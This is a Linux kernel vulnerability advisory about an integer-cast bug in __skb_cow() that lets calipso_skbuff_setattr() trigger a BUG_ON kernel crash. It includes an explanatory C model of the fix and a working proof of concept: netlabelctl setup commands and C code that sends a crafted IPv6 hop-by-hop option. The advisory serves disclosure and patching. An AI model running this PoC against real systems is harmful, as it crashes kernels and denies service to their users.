Description
In the Linux kernel, the following vulnerability has been resolved:

ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()

There exists a kernel oops caused by BUG_ON(nhead < 0) at
net/core/skbuff.c:2232 in pskb_expand_head().

This bug is triggered in the calipso_skbuff_setattr() routine when
skb_cow() is passed a headroom > INT_MAX (i.e. (int)(skb_headroom(skb) +
len_delta) < 0).

The root cause is an implicit integer cast in __skb_cow(). The check
(headroom > skb_headroom(skb)) is meant to ensure that
delta = headroom - skb_headroom(skb) is never negative, otherwise we
will trigger the BUG_ON in pskb_expand_head(). However, headroom is an
unsigned int: if headroom > INT_MAX and <= -NET_SKB_PAD (as an unsigned
value), the check passes and delta, once stored as an int, becomes a
negative value for nhead.

Fix the condition in calipso_skbuff_setattr(). Avoid passing "negative"
sizes within calipso_skbuff_setattr() by only using skb_cow() to grow
headroom.
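To make the cast concrete, here is an added C model (not part of the advisory or of the kernel's own code) that mirrors __skb_cow()'s check and the pre-fix and post-fix shapes of the calipso_skbuff_setattr() call; NET_SKB_PAD = 64 and the headroom/len_delta values are assumed, constructed inputs.

```c
#include <stdio.h>

/* Assumed value: NET_SKB_PAD is max(32, L1_CACHE_BYTES); 64 on x86_64. */
#define NET_SKB_PAD 64
/* Same rounding the kernel's ALIGN() applies to the delta. */
#define ALIGN(x, a) (((x) + (a) - 1) & ~((a) - 1))

/* Model of __skb_cow(): returns the nhead that would be handed to
 * pskb_expand_head(). A negative result is exactly the BUG_ON(nhead < 0) case. */
static int skb_cow_nhead(unsigned int cur_headroom, unsigned int headroom)
{
    int delta = 0;

    /* Unsigned comparison: a "negative" headroom has wrapped past INT_MAX,
     * so it is larger than cur_headroom and the guard passes. */
    if (headroom > cur_headroom)
        delta = headroom - cur_headroom;   /* implicit unsigned -> int cast */

    if (delta)
        return ALIGN(delta, NET_SKB_PAD);  /* stays negative when delta <= -NET_SKB_PAD */
    return 0;
}

/* Pre-fix shape: skb_cow(skb, skb_headroom(skb) + len_delta) is called
 * unconditionally, so a negative len_delta wraps to a huge unsigned headroom. */
static int calipso_cow_before(unsigned int cur_headroom, int len_delta)
{
    return skb_cow_nhead(cur_headroom, cur_headroom + len_delta);
}

/* Post-fix shape: only ask skb_cow() for more headroom when the option grows;
 * shrinking the option never needs a reallocation. */
static int calipso_cow_after(unsigned int cur_headroom, int len_delta)
{
    if (len_delta > 0)
        return skb_cow_nhead(cur_headroom, cur_headroom + len_delta);
    return 0;
}

int main(void)
{
    /* Constructed inputs: 64 bytes of headroom, option shrinking by 80 bytes. */
    printf("before fix: nhead = %d\n", calipso_cow_before(64, -80)); /* -64: BUG_ON fires */
    printf("after fix:  nhead = %d\n", calipso_cow_after(64, -80));  /* 0: no reallocation */
    printf("growing by 16: nhead = %d\n", calipso_cow_after(64, 16)); /* 64 */
    return 0;
}
```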
PoC:

Using the `netlabelctl` tool:

netlabelctl map del default
netlabelctl calipso add pass doi:7
netlabelctl map add default address:0::1/128 protocol:calipso,7

Then run the PoC:
int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);

// setup msghdr
int cmsg_size = 2;
int cmsg_len = 0x60;
struct msghdr msg;
struct sockaddr_in6 dest_addr;
struct cmsghdr *cmsg = (struct cmsghdr *) calloc(1, sizeof(struct cmsghdr) + cmsg_len);

msg.msg_name = &dest_addr;
msg.msg_namelen = sizeof(dest_addr);
msg.msg_iov = NULL;
msg.msg_iovlen = 0;
msg.msg_control = cmsg;
msg.msg_controllen = cmsg_len;
msg.msg_flags = 0;

// sockaddr
dest_addr.sin6_family = AF_INET6;
dest_addr.sin6_port = htons(31337);
dest_addr.sin6_flowinfo = htonl(31337);
dest_addr.sin6_addr = in6addr_loopback;
dest_addr.sin6_scope_id = 31337;

// cmsghdr
cmsg->cmsg_len = cmsg_len;
cmsg->cmsg_level = IPPROTO_IPV6;
cmsg->cmsg_type = IPV6_HOPOPTS;
char *hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);
hop_hdr[1] = 0x9; // set hop-by-hop header size: (0x9 + 1) * 8 = 80 bytes

sendmsg(fd, &msg, 0);
https://git.kernel.org/stable/c/2bb759062efa188ea5d07242a43e5aa5464bbae1
https://git.kernel.org/stable/c/58fc7342b529803d3c221101102fe913df7adb83
https://git.kernel.org/stable/c/73744ad5696dce0e0f43872aba8de6a83d6ad570
https://git.kernel.org/stable/c/bf3709738d8a8cc6fa275773170c5c29511a0b24
https://git.kernel.org/stable/c/c53aa6a5086f03f19564096ee084a202a8c738c0